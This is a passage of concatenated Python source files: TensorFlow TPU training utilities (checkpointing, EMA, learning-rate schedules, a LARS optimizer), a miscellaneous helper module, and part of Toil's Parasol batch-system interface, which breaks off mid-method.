if restore_ema:
logging.info('Restore EMA values')
for v in tf.global_variables():
if v.name.startswith('ema'):
logging.fatal(f'wrong ema var name `{v.name}`')
if 'global_step' in v.name:
var_list['global_step'] = v
else:
var_list['ema/' + strip_var_name(v.name)] = v
else:
for v in tf.global_variables():
var_list[strip_var_name(v.name)] = v
saver = tf.train.Saver(var_list,
max_to_keep=max_to_keep,
save_relative_paths=True)
return saver
class AsyncCheckpoint(object):
"""Saves checkpoint using a separated thread."""
def __init__(self, saver, ckpt_dir, max_to_keep=None):
self._saver = saver
self._ckpt_dir = ckpt_dir
self._max_to_keep = max_to_keep
self._thread = None
self.latest_checkpoint = None
def join(self):
if self._thread is not None:
self._thread.join()
def save(self, sess, step):
"""Docs."""
def _save_fn():
"""Run the saver process."""
raw_sess = sess if isinstance(sess, tf.Session) else sess.raw_session()
ckpt_path = self._saver.save(
raw_sess,
save_path=os.path.join(self._ckpt_dir, 'ckpt'),
global_step=step,
write_meta_graph=False,
write_state=False)
self.latest_checkpoint = ckpt_path[len(self._ckpt_dir) + 1:]
logging.info(f'Saved checkpoint `{ckpt_path}`')
all_checkpoints = get_all_checkpoints(self._ckpt_dir)
assert all_checkpoints is not None
new_ckpt_content = [f'model_checkpoint_path: "{all_checkpoints[-1]}"']
if (self._max_to_keep is not None and
self._max_to_keep < len(all_checkpoints)):
pattern = all_checkpoints[0] + '*'
gfile.BulkDelete(gfile.Glob(pattern))
# pylint: disable=invalid-unary-operand-type
all_checkpoints = all_checkpoints[-self._max_to_keep:]
# pylint: enable=invalid-unary-operand-type
for ckpt_name in all_checkpoints:
new_ckpt_content.append(f'all_model_checkpoint_paths: "{ckpt_name}"')
checkpoint_file = os.path.join(self._ckpt_dir, 'checkpoint')
with gfile.GFile(checkpoint_file, 'w') as fout:
fout.write('\n'.join(new_ckpt_content))
if self._thread is not None:
self._thread.join(timeout=0.1)
if self._thread.is_alive():
logging.info('Saver thread still in progress, skipping checkpoint.')
return
self._thread = threading.Thread(target=_save_fn)
self._thread.start()
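
# Minimal usage sketch for AsyncCheckpoint (the directory and step values are
# illustrative assumptions):
#   saver = get_saver(max_to_keep=5)
#   ckpt = AsyncCheckpoint(saver, ckpt_dir='/tmp/run0', max_to_keep=5)
#   ckpt.save(sess, step)   # returns immediately; saving runs in a thread
#   ckpt.join()             # block until the background save has finished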
def should_log(params):
"""Returns a Boolean `tf.Tensor` dictating whether we should log values."""
global_step = tf.train.get_or_create_global_step()
first_run = tf.equal(global_step, 1)
log_every = tf.equal(tf.floormod(global_step, params.log_every), 0)
return tf.logical_or(first_run, log_every)
def get_all_checkpoints(ckpt_dir):
"""Returns a list of all checkpoints, eg `['ckpt-100', 'ckpt-500']`."""
if not gfile.IsDirectory(ckpt_dir):
return []
pattern = ckpt_dir + '/ckpt-*'
s = len(ckpt_dir) + len('/ckpt-')
checkpoints = [int(f.split('.')[0][s:]) for f in gfile.Glob(pattern)]
checkpoints = [os.path.join(ckpt_dir, 'ckpt-{0}'.format(v))
for v in sorted(set(checkpoints))]
return checkpoints
def get_latest_checkpoint(ckpt_dir):
"""Returns a list of all checkpoints, eg `['ckpt-100', 'ckpt-500']`."""
all_checkpoints = get_all_checkpoints(ckpt_dir)
all_checkpoints = [ckpt for ckpt in all_checkpoints if 'temp' not in ckpt]
if all_checkpoints:
return all_checkpoints[-1]
else:
return None
def get_outfeed_ops(params, signature):
"""Create TPU outfeed ops."""
outfeed_dtypes, outfeed_shapes = [], []
for dtype, shape in signature.values():
outfeed_dtypes.append(dtype)
outfeed_shapes.append(shape)
outfeed_ops = []
outfeed_graph = tf.Graph()
dev_assign = params.device_assignment
host_to_tpus = {}
for replica_id in range(params.num_replicas):
host_device = dev_assign.host_device(
replica=replica_id, logical_core=params.num_cores_per_replica-1)
tpu_ordinal = dev_assign.tpu_ordinal(
replica=replica_id, logical_core=params.num_cores_per_replica-1)
if host_device not in host_to_tpus:
host_to_tpus[host_device] = [tpu_ordinal]
else:
assert tpu_ordinal not in host_to_tpus[host_device]
host_to_tpus[host_device].append(tpu_ordinal)
with outfeed_graph.as_default():
for host, tpus in host_to_tpus.items():
with tf.device(host):
for device_ordinal in tpus:
device_outfeed = tf.raw_ops.OutfeedDequeueTuple(
dtypes=outfeed_dtypes,
shapes=outfeed_shapes,
device_ordinal=device_ordinal)
outfeed_ops.append(device_outfeed)
return outfeed_ops, outfeed_graph
class InfeedThread(object):
"""InfeedTread wrapper."""
def __init__(self, params, infeed_ops, infeed_graphs, name='infeed_thread'):
if infeed_graphs is not None:
assert isinstance(infeed_graphs, list)
assert len(infeed_graphs) == len(infeed_ops)
self.infeed_ops = infeed_ops
self.infeed_graphs = infeed_graphs
self.sessions = []
for g in infeed_graphs:
with g.as_default():
sess = tf.Session(target=params.master, graph=g)
self.sessions.append(sess)
self.name = name
self._threads = []
def stop(self):
self.join()
for sess in self.sessions:
sess.close()
def join(self):
for thread in self._threads:
if thread is not None:
thread.join(timeout=0.1)
del thread
def start(self, verbose=False):
"""Docs."""
if verbose:
logging.info(f'Start thread for `{self.name}`')
def _infeed_fn(sess, infeed_op, infeed_graph):
"""Run the infeed process."""
with infeed_graph.as_default():
sess.run(infeed_op)
for sess, op, g in zip(self.sessions, self.infeed_ops, self.infeed_graphs):
thread = threading.Thread(target=_infeed_fn, args=(sess, op, g))
thread.daemon = True
thread.start()
self._threads.append(thread)
class OutfeedThread(object):
"""OutfeedThread wrapper."""
def __init__(self, params, outfeed_ops, outfeed_graph, outfeed_signature,
name='outfeed_thread'):
self.params = params
self.outfeed_ops = outfeed_ops
self.outfeed_graph = outfeed_graph
self.outfeed_signature = outfeed_signature
with outfeed_graph.as_default():
self.session = tf.Session(target=params.master, graph=outfeed_graph)
self.name = name
self._thread = None
def join(self):
if self._thread is not None:
self._thread.join(timeout=0.1)
self._thread = None
self.session.close()
def start(self, verbose=False):
"""Docs."""
if verbose:
logging.info(f'Start thread for `{self.name}`')
if self._thread is not None:
return
params = self.params
outfeed_signature = self.outfeed_signature
def _outfeed_fn():
"""Read from `outfeed_dequeue` and write `Summary`."""
train_logdir = os.path.join(params.output_dir, 'logs', 'train')
summary_writer = tf.summary.FileWriter(train_logdir)
summary_tags = list(outfeed_signature.keys())
while True:
outfeeds = self.session.run(self.outfeed_ops)
outfeeds = np.array(outfeeds).reshape([params.num_replicas, -1])
outfeeds = np.sum(outfeeds, axis=0).tolist()
summary_values = []
for tag, value in zip(summary_tags, outfeeds):
if tag == 'global_step':
value /= params.num_replicas
step = value
else:
summary_values.append(tf.Summary.Value(tag=tag, simple_value=value))
summary_writer.add_summary(tf.Summary(value=summary_values), step)
summary_writer.flush()
if step >= params.num_train_steps:
summary_writer.close()
break
self._thread = threading.Thread(target=_outfeed_fn)
self._thread.daemon = True
self._thread.start()
def setup_ema(params, name_scope=None):
"""Create exponential moving average for all variables under `name_scope`."""
logging.info(f'ema_decay with rate {params.ema_decay}')
all_vars = tf.global_variables()
ema_ops = []
step = tf.cast(tf.train.get_or_create_global_step() - params.ema_start,
tf.float32)
decay = 1. - tf.minimum(params.ema_decay, (step+1.) / (step+10.))
decay = tf.cond(tf.train.get_or_create_global_step() < params.ema_start,
lambda: tf.constant(1, tf.float32), lambda: decay)
def should_skip(v):
key_words = ['momentum', 'rms', 'global_step', 'debug', 'adam', 'lars']
conditions = [k in v.name.lower() for k in key_words]
if name_scope is not None:
conditions += [not v.name.lower().startswith(name_scope)]
return any(conditions)
def get_init(v_name):
key_words = ['variance', 'beta']
if any([k in v_name for k in key_words]):
return tf.initializers.ones()
return tf.initializers.zeros()
with tf.variable_scope('ema'):
for v in all_vars:
if not should_skip(v):
v_name = strip_var_name(v.name)
with tf.device(v.device):
ema_var = tf.get_variable(
name=v_name,
shape=v.shape.as_list(),
initializer=get_init(v_name),
trainable=False)
v = shard_weight(v, params.num_cores_per_replica)
ema = shard_weight(ema_var, params.num_cores_per_replica)
ema_op = tf.assign_sub(ema_var, decay * (ema-v), use_locking=True)
ema_ops.append(ema_op)
ema_op = tf.group(*ema_ops)
return ema_op
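# A minimal usage sketch (illustrative only; `train_op`, `optimizer` and `params` are assumed
# to exist as elsewhere in this file and are not part of setup_ema's API):
#   train_op = optimizer.apply_gradients(grads_and_vars, global_step=global_step)
#   with tf.control_dependencies([train_op]):
#     ema_op = setup_ema(params, name_scope='model')
#   sess.run(ema_op)  # running the EMA update also runs `train_op` via the control dependency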
def get_session(params, isolate_session_state=True):
"""Builds and returns a `tf.Session`."""
config = tf.ConfigProto(
isolate_session_state=isolate_session_state,
allow_soft_placement=True,
graph_options=tf.GraphOptions(
optimizer_options=tf.OptimizerOptions(
opt_level=tf.OptimizerOptions.L0,
do_common_subexpression_elimination=False,
do_function_inlining=False,
do_constant_folding=False)))
return tf.Session(target=params.master, config=config)
def get_learning_rate(params, initial_lr=None, num_warmup_steps=None,
num_wait_steps=None):
"""Build learning rate."""
global_step = tf.train.get_or_create_global_step()
if initial_lr is None:
initial_lr = params.lr
initial_lr = initial_lr * params.train_batch_size / 256.
if num_warmup_steps is None:
num_warmup_steps = params.num_warmup_steps
if num_wait_steps is not None:
global_step = global_step - num_wait_steps
if params.lr_decay_type == 'constant':
lr = tf.constant(initial_lr, dtype=tf.float32)
elif params.lr_decay_type == 'exponential':
lr = tf.train.exponential_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_decay_steps,
decay_rate=params.lr_decay_rate,
staircase=True)
elif params.lr_decay_type == 'cosine':
if num_wait_steps is None:
lr = tf.train.cosine_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_train_steps-num_warmup_steps,
alpha=0.0)
else:
lr = tf.train.cosine_decay(
learning_rate=initial_lr,
global_step=global_step-num_warmup_steps,
decay_steps=params.num_train_steps-num_warmup_steps-num_wait_steps,
alpha=0.0)
else:
raise ValueError(f'Unknown lr_decay_type `{params.lr_decay_type}`')
r = (tf.cast(global_step+1, tf.float32) /
tf.cast(num_warmup_steps, tf.float32))
warmup_lr = initial_lr * r
lr = tf.cond(global_step < num_warmup_steps, lambda: warmup_lr, lambda: lr)
if num_wait_steps is not None:
lr = tf.cond(global_step < 0,
lambda: tf.constant(0., tf.float32), lambda: lr)
return lr
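# Usage sketch (reads the same `params` fields as above: lr, train_batch_size, lr_decay_type,
# num_warmup_steps, num_train_steps, ...):
#   lr = get_learning_rate(params)                      # linear warmup, then the chosen decay
#   lr = get_learning_rate(params, initial_lr=0.1,      # or override the base LR and warmup
#                          num_warmup_steps=1000)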
def get_optimizer(params, learning_rate=None):
"""Build optimizer."""
if learning_rate is None:
learning_rate = get_learning_rate(params)
if params.optim_type.lower() == 'sgd':
logging.info('Use SGD')
optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate,
use_locking=True)
elif params.optim_type.lower() == 'momentum':
logging.info('Use Momentum')
optimizer = tf.train.MomentumOptimizer(learning_rate=learning_rate,
momentum=0.9,
use_nesterov=True,
use_locking=True)
elif params.optim_type.lower() == 'rmsprop':
optimizer = tf.train.RMSPropOptimizer(learning_rate=learning_rate,
decay=params.rmsprop_rho,
momentum=params.rmsprop_momentum,
epsilon=params.rmsprop_epsilon,
use_locking=True)
elif params.optim_type.lower() == 'lars':
class LARSOptimizer(tf.train.Optimizer):
"""Layer-wise Adaptive Rate Scaling for large batch training.
Introduced by "Large Batch Training of Convolutional Networks" by Y. You,
I. Gitman, and B. Ginsburg. (https://arxiv.org/abs/1708.03888)
Implements the LARS learning rate scheme presented in the paper above.
This optimizer is useful when scaling the batch size to up to 32K without
significant performance degradation. It is recommended to use the
optimizer in conjunction with:
- Gradual learning rate warm-up
- Linear learning rate scaling
- Poly rule learning rate decay
Note, LARS scaling is currently only enabled for dense tensors. Sparse
tensors use the default momentum optimizer.
"""
def __init__(
self,
learning_rate,
momentum=0.9,
weight_decay=0.0001,
# The LARS coefficient is a hyperparameter
eeta=0.001,
epsilon=0.0,
name='LARSOptimizer',
# Enable skipping variables from LARS scaling.
# TODO(sameerkm): Enable a direct mechanism to pass a
# subset of variables to the optimizer.
skip_list=None,
use_nesterov=False):
"""Construct a new LARS Optimizer.
Args:
learning_rate: A `Tensor` or floating point value.
momentum: A floating point value. Momentum hyperparameter.
weight_decay: A floating point value. Weight decay hyperparameter.
          eeta: LARS coefficient as used in the paper. Default set to the LARS
coefficient from the paper. (eeta / weight_decay) determines the
highest scaling factor in LARS.
epsilon: Optional epsilon parameter to be set in models that have very
small gradients. Default set to 0.0.
name: Optional name prefix for variables and ops created.
skip_list: List of strings to enable skipping variables from scaling.
            If any of the strings in skip_list is a substring of var.name, variable
'var' is skipped from LARS scaling. For a typical classification
model with batch normalization, the skip_list is
['batch_normalization', 'bias']
use_nesterov: when set to True, nesterov momentum will be enabled
Raises:
ValueError: If a hyperparameter is set to a non-sensical value.
"""
if momentum < 0.0:
raise ValueError(f'momentum should be positive: {momentum}')
if weight_decay < 0.0:
raise ValueError(f'weight_decay should be positive: {weight_decay}')
super(LARSOptimizer, self).__init__(use_locking=False, name=name)
self._learning_rate = learning_rate
self._momentum = momentum
self._weight_decay = weight_decay
self._eeta = eeta
self._epsilon = epsilon
self._name = name
self._skip_list = skip_list
self._use_nesterov = use_nesterov
def _create_slots(self, var_list):
for v in var_list:
self._zeros_slot(v, 'momentum', self._name)
def compute_lr(self, grad, var):
scaled_lr = self._learning_rate
if self._skip_list is None or not any(v in var.name
for v in self._skip_list):
w_norm = tf.norm(var, ord=2)
g_norm = tf.norm(grad, ord=2)
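          # LARS trust ratio: eeta * ||w|| / (||g|| + weight_decay * ||w|| + epsilon),
          # falling back to 1.0 whenever the weight norm or gradient norm is zero.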
trust_ratio = tf.where(
tf.math.greater(w_norm, 0),
tf.where(
tf.math.greater(g_norm, 0),
(self._eeta * w_norm / (
g_norm + self._weight_decay * w_norm + self._epsilon)),
1.0),
1.0)
scaled_lr = self._learning_rate * trust_ratio
# Add the weight regularization gradient
grad = grad + self._weight_decay * var
return scaled_lr, grad
def _apply_dense(self, grad, var):
scaled_lr, grad = self.compute_lr(grad, var)
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ApplyMomentum(
var,
mom,
tf.cast(1.0, var.dtype.base_dtype),
grad * scaled_lr,
self._momentum,
use_locking=False,
use_nesterov=self._use_nesterov)
def _resource_apply_dense(self, grad, var):
scaled_lr, grad = self.compute_lr(grad, var)
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ResourceApplyMomentum(
var=var.handle,
accum=mom.handle,
lr=tf.cast(1.0, var.dtype.base_dtype),
grad=grad * scaled_lr,
momentum=self._momentum,
use_locking=False,
use_nesterov=self._use_nesterov)
# Fallback to momentum optimizer for sparse tensors
def _apply_sparse(self, grad, var):
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.SparseApplyMomentum(
var,
mom,
tf.cast(self._learning_rate_tensor, var.dtype.base_dtype),
grad.values,
grad.indices,
tf.cast(self._momentum_tensor, var.dtype.base_dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov).op
def _resource_apply_sparse(self, grad, var, indices):
mom = self.get_slot(var, 'momentum')
return tf.raw_ops.ResourceSparseApplyMomentum(
var.handle,
mom.handle,
tf.cast(self._learning_rate_tensor, grad.dtype),
grad,
indices,
tf.cast(self._momentum_tensor, grad.dtype),
use_locking=self._use_locking,
use_nesterov=self._use_nesterov)
def _prepare(self):
learning_rate = self._learning_rate
if callable(learning_rate):
learning_rate = learning_rate()
self._learning_rate_tensor = tf.convert_to_tensor(
learning_rate, name='learning_rate')
momentum = self._momentum
if callable(momentum):
momentum = momentum()
self._momentum_tensor = tf.convert_to_tensor(momentum, name='momentum')
optimizer = LARSOptimizer(
learning_rate=learning_rate,
weight_decay=params.weight_decay,
skip_list=['batch_norm', 'batchnorm', 'gamma', 'beta', 'bias'],
use_nesterov=True)
else:
raise ValueError(f'Unknown optim_type `{params.optim_type}`')
return learning_rate, optimizer
def get_l2_loss(excluded_keywords=None):
"""Traverse `tf.trainable_variables` compute L2 reg. Ignore `batch_norm`."""
def _is_excluded(v):
"""Guess whether a variable belongs to `batch_norm`."""
keywords = ['batchnorm', 'batch_norm', 'bn',
'layernorm', 'layer_norm']
if excluded_keywords is not None:
keywords += excluded_keywords
return any([k in v.name.lower() for k in keywords])
l2_losses = [tf.nn.l2_loss(v) for v in tf.trainable_variables()
if not _is_excluded(v)]
return tf.add_n(l2_losses)
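# Usage sketch (assumes a `params.weight_decay` coefficient, as used elsewhere in this file):
#   total_loss = cross_entropy_loss + params.weight_decay * get_l2_loss()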
def add_weight_decay(params, variables, gradients):
"""Add the gradients of `weight_decay` to existing `gradients`."""
def should_skip_(v):
"""Guess whether a variable belongs to `batch_norm`."""
keywords = ['batchnorm', 'batch_norm', 'bn', 'layer_norm', 'layernorm']
return any([k in v.name.lower() for k in keywords])
reg_gradients = []
for v, g in zip(variables, gradients):
with tf.device(v.device):
if g is not None:
g = tf.tpu.cross_replica_sum(g)
if should_skip_(v):
reg_gradients.append(g)
else:
if params.use_xla_sharding:
v = shard_weight(v, params.num_cores_per_replica)
if g is None:
reg_gradients.append(tf.stop_gradient(v) * params.weight_decay)
else:
reg_gradients.append(g + tf.stop_gradient(v) * params.weight_decay)
return reg_gradients
def clip_batch_norm_grads(variables, gradients, grad_bound=0.1):
"""Add the gradients of `weight_decay` to existing `gradients`."""
clipped_gradients = []
for v, g in zip(variables, gradients):
v_name = v.name.lower()
with tf.device(v.device):
if g is not None and ('beta' in v_name or 'gamma' in v_name):
g = tf.clip_by_value(g, -grad_bound, grad_bound)
clipped_gradients.append(g)
return clipped_gradients
def shard_weight(w, num_cores):
"""Apply XLA sharding to a weight `w`."""
del num_cores
return w
def shard_tensor(x, num_cores):
"""Apply XLA sharding to a tensor `x`."""
del num_cores
return x
|
em_utils.py
|
"""
Contains some misc utility functions
"""
import collections
import multiprocessing
from collections import OrderedDict
from collections.abc import Callable, Mapping
from functools import reduce
import numpy as np
def as_list(obj):
"""
Makes sure `obj` is a list or otherwise converts it to a list with a single element.
:param obj:
:return: A `list`
"""
return obj if isinstance(obj, list) else [obj]
def maybe_call(obj, *args, **kwargs):
"""
    Calls obj with args and kwargs and returns its result if obj is callable, otherwise returns obj.
"""
if callable(obj):
return obj(*args, **kwargs)
return obj
def as_tuple_or_list(obj):
"""
    Make sure that `obj` is a tuple or a list, otherwise convert it into a single-element list
:param obj:
:return: A `tuple` or a `list`
"""
return obj if isinstance(obj, (list, tuple)) else [obj]
def maybe_get(obj, i):
return obj[i] if hasattr(obj, "__getitem__") else obj
def merge_dicts(*dicts):
return reduce(lambda a, nd: {**a, **nd}, dicts, {})
def flatten_list(lst):
from itertools import chain
return list(chain(*lst))
def filter_vars(var_name, scope):
import tensorflow as tf
return [
v
for v in tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES,
scope=scope.name if hasattr(scope, "name") else scope,
)
if v.name.endswith("%s:0" % var_name)
]
def name_from_vars(var_dict, *vars_):
"""
    Builds a name from the entries of `var_dict` that correspond to `vars_`. Note that the resulting name is not guaranteed to be unique or particularly readable.
:param var_dict:
:param vars_:
:return:
"""
new_k_v = {}
for v in vars_:
for k, vv in var_dict.items():
if v == vv:
new_k_v[k] = v
return name_from_dict(new_k_v)
def name_from_dict(_dict, *exclude_names):
string_dict = {str(k): str(v) for k, v in _dict.items() if k not in exclude_names}
return _tf_string_replace("_".join(flatten_list(list(sorted(string_dict.items())))))
def _tf_string_replace(_str):
"""
    Replace characters that are not accepted by TensorFlow names (e.g. variable_scope)
:param _str:
:return:
"""
return (
_str.replace("[", "p")
.replace("]", "q")
.replace(",", "c")
.replace("(", "p")
.replace(")", "q")
.replace(" ", "")
)
def namedtuple_with_defaults(typename, field_names, default_values=()):
T = collections.namedtuple(typename, field_names)
T.__new__.__defaults__ = (None,) * len(T._fields)
    if isinstance(default_values, Mapping):
prototype = T(**default_values)
else:
prototype = T(*default_values)
T.__new__.__defaults__ = tuple(prototype)
return T
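# Example (illustrative names only):
#   Config = namedtuple_with_defaults('Config', ['lr', 'epochs'], {'epochs': 10})
#   Config(lr=0.1)  # -> Config(lr=0.1, epochs=10)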
def get_rand_state(rand):
"""
    Utility method for getting a `RandomState` object.
:param rand: rand can be None (new State will be generated),
np.random.RandomState (it will be returned) or an integer (will be treated as seed).
:return: a `RandomState` object
"""
if isinstance(rand, np.random.RandomState):
return rand
elif isinstance(rand, (int, np.ndarray, list)) or rand is None:
return np.random.RandomState(rand)
else:
raise ValueError("parameter rand {} has wrong type".format(rand))
def GPU_CONFIG():
import tensorflow as tf
CONFIG_GPU_GROWTH = tf.ConfigProto(allow_soft_placement=True)
CONFIG_GPU_GROWTH.gpu_options.allow_growth = True
return CONFIG_GPU_GROWTH
# SOME SCORING UTILS FUNCTIONS
half_int = lambda _m: 1.96 * np.std(_m) / np.sqrt(len(_m) - 1)
def mean_std_ci(measures, mul=1.0, tex=False):
"""
Computes mean, standard deviation and 95% half-confidence interval for a list of measures.
:param measures: list
:param mul: optional multiplication coefficient (e.g. for percentage)
:param tex: if True returns mean +- half_conf_interval for latex
:return: a list or a string in latex
"""
measures = np.array(measures) * mul
ms = np.mean(measures), np.std(measures), half_int(measures)
return ms if not tex else r"${:.2f} \pm {:.2f}$".format(ms[0], ms[2])
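# Example (made-up accuracies): mean_std_ci([0.91, 0.92, 0.93], mul=100, tex=True)
# returns r'$92.00 \pm 1.13$' (mean and 95% half-interval, both scaled by `mul`).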
def leaky_relu(x, alpha, name=None):
"""
    Implements leaky ReLU with negative-slope coefficient `alpha`
"""
import tensorflow as tf
with tf.name_scope(name, "leaky_relu_{}".format(alpha)):
return tf.nn.relu(x) - alpha * tf.nn.relu(-x)
def execute(target, *args, **kwargs):
pr = multiprocessing.Process(target=target, args=args, kwargs=kwargs)
pr.start()
return pr
def get_global_step(name="GlobalStep", init=0):
import tensorflow as tf
return tf.get_variable(
name,
initializer=init,
trainable=False,
collections=[tf.GraphKeys.GLOBAL_STEP, tf.GraphKeys.GLOBAL_VARIABLES],
)
class DefaultOrderedDict(OrderedDict):
# Source: http://stackoverflow.com/a/6190500/562769
def __init__(self, default_factory=None, *a, **kw):
if default_factory is not None and not isinstance(default_factory, Callable):
raise TypeError("first argument must be callable")
OrderedDict.__init__(self, *a, **kw)
self.default_factory = default_factory
def __getitem__(self, key):
try:
return OrderedDict.__getitem__(self, key)
except KeyError:
return self.__missing__(key)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = value = self.default_factory()
return value
def __reduce__(self):
if self.default_factory is None:
args = tuple()
else:
args = (self.default_factory,)
return type(self), args, None, None, self.items()
def copy(self):
return self.__copy__()
def __copy__(self):
return type(self)(self.default_factory, self)
def __deepcopy__(self, memo):
import copy
return type(self)(self.default_factory, copy.deepcopy(self.items()))
def __repr__(self):
return "OrderedDefaultDict(%s, %s)" % (
self.default_factory,
OrderedDict.__repr__(self),
)
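# Example:
#   d = DefaultOrderedDict(list)
#   d['a'].append(1)  # missing keys are created via the factory; insertion order is preserved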
|
parasol.py
|
#!/usr/bin/env python
# Copyright (C) 2015 UCSC Computational Genomics Lab
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
import logging
import os
import re
import sys
import subprocess
import time
from Queue import Empty
from multiprocessing import Process
from multiprocessing import JoinableQueue as Queue
#from threading import Thread
#from Queue import Queue, Empty
from toil.batchSystems.abstractBatchSystem import AbstractBatchSystem
logger = logging.getLogger( __name__ )
def getParasolResultsFileName(toilPath):
return os.path.join(toilPath, "results.txt")
def popenParasolCommand(command, runUntilSuccessful=True):
"""Issues a parasol command using popen to capture the output.
    If the command fails and runUntilSuccessful is True, the command is retried every ten
    seconds until it succeeds; the successful exit value (0) and output are then returned.
    If runUntilSuccessful is False, the non-zero exit value is returned together with None
    in place of the output.
"""
while True:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=sys.stderr, bufsize=-1)
output, nothing = process.communicate() #process.stdout.read().strip()
exitValue = process.wait()
if exitValue == 0:
return 0, output.split("\n")
message = "The following parasol command failed (exit value %s): %s" % (exitValue, command)
if not runUntilSuccessful:
logger.error(message)
return exitValue, None
else:
logger.warn(message)
time.sleep(10)
logger.warn("Waited for a few seconds, will try again")
def getUpdatedJob(parasolResultsFile, outputQueue1, outputQueue2):
"""We use the parasol results to update the status of jobs, adding them
to the list of updated jobs.
Results have the following structure.. (thanks Mark D!)
int status; /* Job status - wait() return format. 0 is good. */
char *host; /* Machine job ran on. */
char *jobId; /* Job queuing system job ID */
char *exe; /* Job executable file (no path) */
int usrTicks; /* 'User' CPU time in ticks. */
int sysTicks; /* 'System' CPU time in ticks. */
unsigned submitTime; /* Job submission time in seconds since 1/1/1970 */
unsigned startTime; /* Job start time in seconds since 1/1/1970 */
unsigned endTime; /* Job end time in seconds since 1/1/1970 */
char *user; /* User who ran job */
char *errFile; /* Location of stderr file on host */
plus you finally have the command name..
"""
parasolResultsFileHandle = open(parasolResultsFile, 'r')
while True:
line = parasolResultsFileHandle.readline()
if line != '':
results = line.split()
result = int(results[0])
jobID = int(results[2])
outputQueue1.put(jobID)
outputQueue2.put((jobID, result))
else:
time.sleep(0.01) #Go to sleep to avoid churning
class ParasolBatchSystem(AbstractBatchSystem):
"""The interface for Parasol.
"""
def __init__(self, config, maxCores, maxMemory, maxDisk):
AbstractBatchSystem.__init__(self, config, maxCores, maxMemory, maxDisk) #Call the parent constructor
if maxMemory != sys.maxint:
logger.warn("A max memory has been specified for the parasol batch system class of %i, but currently "
"this batchsystem interface does not support such limiting" % maxMemory)
#Keep the name of the results file for the pstat2 command..
self.parasolCommand = config.parasolCommand
self.parasolResultsFile = getParasolResultsFileName(config.jobStore)
#Reset the job queue and results (initially, we do this again once we've killed the jobs)
self.queuePattern = re.compile("q\s+([0-9]+)")
self.runningPattern = re.compile("r\s+([0-9]+)\s+[\S]+\s+[\S]+\s+([0-9]+)\s+[\S]+")
self.killBatchJobs(self.getIssuedBatchJobIDs()) #Kill any jobs on the current stack
logger.info("Going to sleep for a few seconds to kill any existing jobs")
time.sleep(5) #Give batch system a second to sort itself out.
logger.info("Removed any old jobs from the queue")
#Reset the job queue and results
exitValue = popenParasolCommand("%s -results=%s clear sick" % (self.parasolCommand, self.parasolResultsFile), False)[0]
        if exitValue != 0:
logger.warn("Could not clear sick status of the parasol batch %s" % self.parasolResultsFile)
exitValue = popenParasolCommand("%s -results=%s flushResults" % (self.parasolCommand, self.parasolResultsFile), False)[0]
        if exitValue != 0:
logger.warn("Could not flush the parasol batch %s" % self.parasolResultsFile)
open(self.parasolResultsFile, 'w').close()
logger.info("Reset the results queue")
        #Stuff to allow max cpus to work
self.outputQueue1 = Queue()
self.outputQueue2 = Queue()
#worker = Thread(target=getUpdatedJob, args=(self.parasolResultsFileHandle, self.outputQueue1, self.outputQueue2))
#worker.setDaemon(True)
worker = Process(target=getUpdatedJob, args=(self.parasolResultsFile, self.outputQueue1, self.outputQueue2))
worker.daemon = True
worker.start()
self.usedCpus = 0
self.jobIDsToCpu = {}
def issueBatchJob(self, command, memory, cores, disk):
"""Issues parasol with job commands.
"""
self.checkResourceRequest(memory, cores, disk)
pattern = re.compile("your job ([0-9]+).*")
parasolCommand = "%s -verbose -ram=%i -cpu=%i -results=%s add job '%s'" % (self.parasolCommand, memory, cores, self.parasolResultsFile, command)
#Deal with the cpus
self.usedCpus += cores
while True: #Process finished results with no wait
try:
jobID = self.outputQueue1.get_nowait()
self.usedCpus -= self.jobIDsToCpu.pop(jobID)
assert self.usedCpus >= 0
self.outputQueue1.task_done()
except Empty:
break
while self.usedCpus > self.maxCores: #If we are still waiting
self.usedCpus -= self.jobIDsToCpu.pop(self.outputQueue1.get())
assert self.usedCpus >= 0
self.outputQueue1.task_done()
#Now keep going
while True:
#time.sleep(0.1) #Sleep to let parasol catch up #Apparently unnecessary
line = popenParasolCommand(parasolCommand)[1][0]
match = pattern.match(line)
if match != None: #This is because parasol add job will return success, even if the job was not properly issued!
break
else:
logger.info("We failed to properly add the job, we will try again after a sleep")
time.sleep(5)
jobID = int(match.group(1))
self.jobIDsToCpu[jobID] = cores
logger.debug("Got the parasol job id: %s from line: %s" % (jobID, line))
logger.debug("Issued the job command: %s with (parasol) job id: %i " % (parasolCommand, jobID))
return jobID
def killBatchJobs(self, jobIDs):
"""Kills the given jobs, represented as Job ids, then checks they are dead by checking
they are not in the list of issued jobs.
"""
while True:
for jobID in jobIDs:
exitValue = popenParasolCommand("%s remove job %i" % (self.parasolCommand, jobID), runUntilSuccessful=False)[0]
logger.info("Tried to remove jobID: %i, with exit value: %i" % (jobID, exitValue))
runningJobs = self.getIssuedBatchJobIDs()
if set(jobIDs).difference(set(runningJobs)) == set(jobIDs):
return
time.sleep(5)
logger.warn("Tried to kill some jobs, but something happened and they are still going, so I'll try again")
def getIssuedBatchJobIDs(self):
"""Gets the list of jobs issued to parasol.
"""
#Example issued job, first field is jobID, last is the results file
#31816891 localhost benedictpaten 2009/07/23 10:54:09 python ~/Desktop/out.txt
issuedJobs = set()
for line in popenParasolCommand("%s -extended list jobs" % self.parasolCommand)[1]:
if line != '':
tokens = line.split()
if tokens[-1] == self.parasolResultsFile:
jobID = int(tokens[0])
issuedJobs.add(jobID)
return list(issuedJobs)
def getRunningBatchJobIDs(self):
"""Returns map of running jobIDs and the time they have been running.
"""
#Example lines..
